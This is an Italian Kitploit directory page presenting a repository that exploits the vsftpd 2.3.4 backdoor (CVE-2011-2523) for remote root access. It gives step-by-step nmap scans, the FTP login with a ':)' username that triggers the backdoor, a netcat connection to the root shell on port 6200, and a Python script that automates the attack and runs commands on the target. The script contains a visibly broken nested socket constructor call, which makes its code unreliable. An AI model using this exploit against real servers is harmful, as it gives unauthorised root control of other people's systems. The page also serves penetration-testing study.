Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
vsftpd-2.3.4---Backdoor-Command-Execution — vsftpd 2.3.4 (CVE-2011-2523) una vulnerabilità critica che porta a Reverse Root Shell. In questo repository farò un PoC su come sfruttarla passo dopo passo, Manualmente e Automaticamente (Python) per scopi educativi. | Kitploit
Strumenti/GitHubGitHub/tshaq17/vsftpd-2.3.4---backdoor-command-execution
Generazione di PayloadAnalisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneStrumento di Accesso Remoto
GitHubtshaq17/vsftpd-2.3.4---backdoor-command-execution

vsftpd-2.3.4---Backdoor-Command-Execution

vsftpd 2.3.4 (CVE-2011-2523) una vulnerabilità critica che porta a Reverse Root Shell. In questo repository farò un PoC su come sfruttarla passo dopo passo, Manualmente e Automaticamente (Python) per scopi educativi.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
6 mesi faNon ancora revisionato

vsftpd-2.3.4---Backdoor-Comando-Esecuzione

vsftpd 2.3.4 (CVE-2011-2523) una vulnerabilità critica che porta a una Root Shell. In questo repo farò un PoC su come sfruttarla passo dopo passo, Manualmente & Automaticamente (Python) per scopi educativi.

Di cosa tratta la vulnerabilità ? Prima di tutto, è uno sfruttamento lato servizio, quindi lo sfrutteremo da remoto. L'idea è che quando ti connetti al servizio FTP sulla porta 21 di default usando un nome utente contenente :), si attiva il sistema per aprire una porta TCP 6200 con una Root Shell, quindi chiunque può connettersi e avere accesso Root al server target, il che è un disastro. Quindi facciamolo praticamente passo dopo passo. Lo spiegherò prima manualmente per avere l'idea completa, poi c'è uno script Python per sfruttarlo automaticamente.

Manualmente

Scansione delle Porte

  1. porta 21 aperta
root@kitploit:~
nmap -p21 -sV -sC -O Target_IP 
image
  1. porta 6200 chiusa
root@kitploit:~
nmap -p6200 Target_IP
  • Porta 6200 è chiusa per ora image

Sfruttamento

  1. Connettiti al servizio FTP e usa un nome utente malevolo per attivare il sistema ad aprire la porta 6200
root@kitploit:~
ftp Target_IP 
  • Username: anything:)
  • Password: anything image
  1. Controlla la porta 6200 dopo la connessione FTP
root@kitploit:~
nmap -p6200 Target_IP

La porta 6200 ora è aperta, quindi questa è la nostra backdoor

image
  1. Connettiti alla porta 6200 per ottenere una Root Shell sull'intero server
root@kitploit:~
nc -nv Target_IP 6200

Finalmente, abbiamo una Root Shell sulla macchina target. image


Automaticamente

Dopo averlo fatto manualmente, conosciamo i passaggi dello sfruttamento:

  1. Connettiti al server FTP sulla porta (21).
  2. Usa un nome utente contenente :) per attivare il backdoor.
  3. connettiti alla porta (6200).
root@kitploit:~
#!/usr/bin/python3 

from ftplib import FTP
import socket
import sys
import time

Target_IP = sys.argv[1]
cmd = sys.argv[2]

# Step1: Connect to FTP
try:
  ftp = FTP(Target_IP,timeout=2)
  ftp.login("user:)","password") # Step2: Send the malicious username
except:
  pass

time.sleep(1) # To give a time for the server to open the port (6200)

#Step3: Connect to port (6200) to have a Root Shell
shell = socket.socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM))
try:
  shell.connect((Target_IP,6200))
except:
  print("Shell Failed")

#Execute the commands
shell.send(cmd.encode() + b"\n")
print(shell.recv(4096).decode())

#Finally close the connection
shell.close()
Scarica lo strumento